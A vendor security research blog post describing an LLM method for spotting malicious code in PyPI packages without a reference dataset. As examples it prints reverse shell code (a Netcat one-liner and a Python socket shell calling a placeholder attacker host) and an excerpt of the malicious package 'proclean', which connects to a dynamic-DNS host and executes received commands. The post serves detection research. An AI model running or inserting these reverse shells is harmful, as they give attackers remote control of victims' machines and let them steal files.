A dataset-free approach to leveraging LLMs for malicious code detection

Research, Technical

February 6 2024

2 min read

Apiiro’s security and AI research team is continuously looking for new ways to leverage GenAI and LLMs to detect the new and constantly evolving threats modern applications and software supply chains face.

Our previously developed LLM Code Patterns (LCPs) methodology proved valuable in detecting such malicious packages by recognizing patterns similar to known malicious packages when leveraging a reliable dataset—but it has limitations. In solving for those limitations, our latest breakthrough builds on LCPs to identify malicious code patterns without having to depend on impossible-to-maintain datasets. In this post, we’ll walk through the challenges of our previous approach and this new, cutting-edge methodology.

Challenges with LLM Code Patterns to detect malicious code

LCPs proved very effective at surfacing malicious code based on previously known malicious code, but maintaining a dataset that encompasses every conceivable attack variant used in malicious code is an overwhelming and never-ending task.

For example, take a reverse shell attack. Its execution can vary significantly, starting with simple Netcat commands such as…

1	nc -e /bin/sh attacker_ip 21

…to more complex implementations in languages such as Python:

import socket, subprocess, os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((ATTACKER_IP, PORT))

os.dup2(s.fileno(), 0)

os.dup2(s.fileno(), 1)

os.dup2(s.fileno(), 2)

p = subprocess.call(["/bin/sh", "-i"])

Attempting to catalog every incarnation of this attack—let alone for every other type of attack—and maintaining an exhaustive, always-up-to-date database would be nearly impossible. To solve this challenge, we set out on a quest for a dataset-free solution.

Introducing LLM Descriptive Patterns (LDP)

Our response to the challenge of maintaining malicious code datasets across different types of attacks, languages, and tools is called LLM Descriptive Patterns—LDP for short.

The LDP mechanism allows the conversion of simple free-text descriptions of cyberattacks into coding patterns recognized by our engines. Merging our previous methodology, LLM Code Patterns (LCP) and LDP, enables us to not only identify if a code snippet executes a specific attack but also to sweep entire code repositories for potential threats described in natural language.

Real-world application of LDP

To demonstrate the power of our search engine, we analyzed thousands of PyPI packages using LDP and were able to pinpoint ones that contained fragments indicative of a reverse shell attack. Several packages, including proclean and sysversion (which are no longer available on PyPI), bore striking similarities to reverse shell implementations. The ability to detect those similarities without a reference database affirms the practical value of our tool in detecting and mitigating such threats effectively.

As can be seen in proclean package code:

import socket

import subprocess

def reliable_send(data):

...

def reliable_recv():

...

def download_file(file_name):

...

def upload_file(file_name):

f = open(file_name, 'rb')

s.send(f.read())

def shell():

while True:

command = reliable_recv()

if command == 'quit':

break

elif command == 'background': # BEGIN

pass

...

elif command[:5] == 'start':

try:

subprocess.Popen(command[6:], shell=True)

reliable_send('[+] Started!')

else:

execute = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,

stdin=subprocess.PIPE)

...

reliable_send(result)

def connection():

while True:

time.sleep(5)

try:

s.connect(('windowupdate.ddns.net', 6007))

shell()

s.close()

break

except:

connection()

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

connection()

The code snippet above from a package called proclean code demonstrates how Apiiro’s engine can use a natural language description of a reverse shell attack to scan and identify similar malicious patterns within code repositories. Instead of searching for exact code matches, the LDP interprets the intent and structure behind the natural language description to find code that behaves in the same way.

Apiiro’s innovative approach using LLM Descriptive Patterns (LDP) to identify malicious code offers significant benefits. By translating free-text descriptions of cyberattacks into recognizable coding patterns, Apiiro’s search engine can detect potential threats without relying on large, exhaustive datasets of known malicious code. Thus, LDP is more adaptable and can keep pace with the evolving nature of application and software supply chain threats. The implications of this technology extend beyond Apiiro, as it represents a shift towards more proactive and dynamic software supply chain security measures.

At Apiiro it’s our mission to make securing the development and delivery to the cloud as efficient as possible. Research like this is crucial in staying ahead of modern attack methods signaled by malicious code. Subscribe to our blog for more research or get in touch to see how Apiiro’s deep ASPM platform surfaces malicious code today.

Gil David

Head of AI

Ella Bor

Data Science Team Lead at Apiiro

Matan Giladi

Security Researcher